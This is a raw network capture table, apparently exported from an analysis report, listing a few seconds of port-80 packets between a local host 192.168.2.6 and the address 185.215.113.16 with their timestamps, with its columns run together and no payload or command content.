                                                                            Oct 31, 2024 20:49:27.402709961 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.402725935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.402776957 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.520694017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.520761967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.520777941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.520840883 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.568207979 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.672866106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.672898054 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.672914028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.672930956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.672939062 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.672960997 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.675481081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.675503969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.675519943 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.675539017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.675559044 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.675626993 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.679251909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.679275990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.679325104 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.759480953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.759809971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.759826899 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.759861946 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.761017084 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.761075020 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.791162014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.791480064 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.791563034 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.880245924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.880506039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.880520105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.880573988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:27.881759882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.881772995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:27.881824970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.010426998 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.010694027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.010705948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.010854959 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.012005091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.012017012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.012061119 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.013374090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.013425112 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.116070986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.116400957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.116414070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.116453886 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.117672920 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.117685080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.117727041 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.232516050 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.232769012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.232783079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.232806921 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.234846115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.234898090 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.235146046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.235158920 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.235188961 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.236433029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.236445904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.236476898 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.376632929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.376961946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.376975060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.377024889 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.377926111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.377943993 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.378071070 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.378556967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.378571033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.378583908 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.378603935 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.378637075 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.514425993 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.514553070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.514566898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.514709949 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.516108036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.516123056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.516156912 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.517124891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.517141104 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.517149925 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.517173052 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.517194033 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.634742022 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.634998083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.635010958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.635046005 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.636022091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.636035919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.636069059 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.637160063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.637175083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.637203932 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.638310909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.638355970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.638362885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.638375044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.638415098 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.753607035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.753843069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.753859043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.753989935 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.754862070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.754875898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.754909039 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.755985022 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.755997896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.756030083 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.757085085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.757097960 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.757110119 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.757122040 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.757144928 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.873507023 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.873615026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.873625994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.873842955 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.874288082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.874304056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.874346018 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.875101089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.875164032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.875309944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.875473976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.875544071 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.876234055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.876254082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.876319885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.877073050 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:28.927582979 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:28.999964952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.000236034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.000248909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.000324965 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.001135111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.001147985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.001194954 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.002371073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.002383947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.002463102 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.003426075 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.003439903 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.003452063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.003528118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.003528118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.119348049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.119473934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.119574070 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.119620085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.162018061 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.273053885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.273313999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.273324966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.273557901 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.274348974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.274360895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.274560928 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.275726080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.275738955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.275958061 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.276575089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.276587963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.276597977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.276726961 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.276726961 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.389399052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.389549017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.389563084 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.389605045 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.390517950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.390531063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.390559912 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.391635895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.391650915 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.391762972 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.392746925 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.392760992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.392827988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.394608021 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.394623041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.394675970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.395003080 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.395016909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.395030975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.395337105 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.395816088 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.396147013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.396161079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.396172047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.396373987 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.397258043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.397733927 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.475235939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.476321936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.476408005 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.627377987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.627518892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.627532959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.627582073 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.628400087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.628416061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.628485918 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.629118919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.629136086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.629204988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.629997015 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.630012035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.630063057 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.630817890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.630835056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.630847931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.630887032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.630922079 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.673938036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.674082041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.674191952 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.715517998 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.715615988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.715632915 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.715790033 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.747344017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.747519970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.747653961 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.787007093 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.835711956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.836091995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.836146116 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.836206913 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.836822987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.836843014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.836896896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.837621927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.837762117 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.938862085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.939162016 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.939245939 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.954776049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.954906940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.955029964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.955075026 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.955540895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.955553055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.955615044 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:29.956649065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:29.956763029 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.073645115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.073858023 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.073869944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.073966026 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.074543953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.074556112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.074724913 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.075556993 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.075567961 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.075617075 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.196269035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.196316957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.196352959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.196440935 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.199055910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.199091911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.199337959 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.199691057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.199852943 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.315007925 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.315258026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.315270901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.315306902 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.316509962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.316575050 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.467542887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.467617989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.467629910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.467725992 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.468539000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.468554974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.468652964 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.469353914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.469369888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.469412088 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.470457077 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.470470905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.470523119 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.471585989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.471600056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.471612930 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.471709967 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.471709967 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.794903040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.794917107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.794970036 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.795278072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.795289040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.795299053 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.795316935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.795331001 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.795507908 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.795773029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.795782089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.795891047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.795902967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.795926094 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.795926094 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.796595097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.796610117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.796622992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.796646118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.796703100 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.797172070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.797208071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.797291994 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.798448086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.798513889 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.800052881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.800291061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.800302029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.800343037 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.801201105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.801211119 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.801235914 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.802062988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.802103996 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.918665886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.919106007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.919121981 CET8049749185.215.113.16192.168.2.6
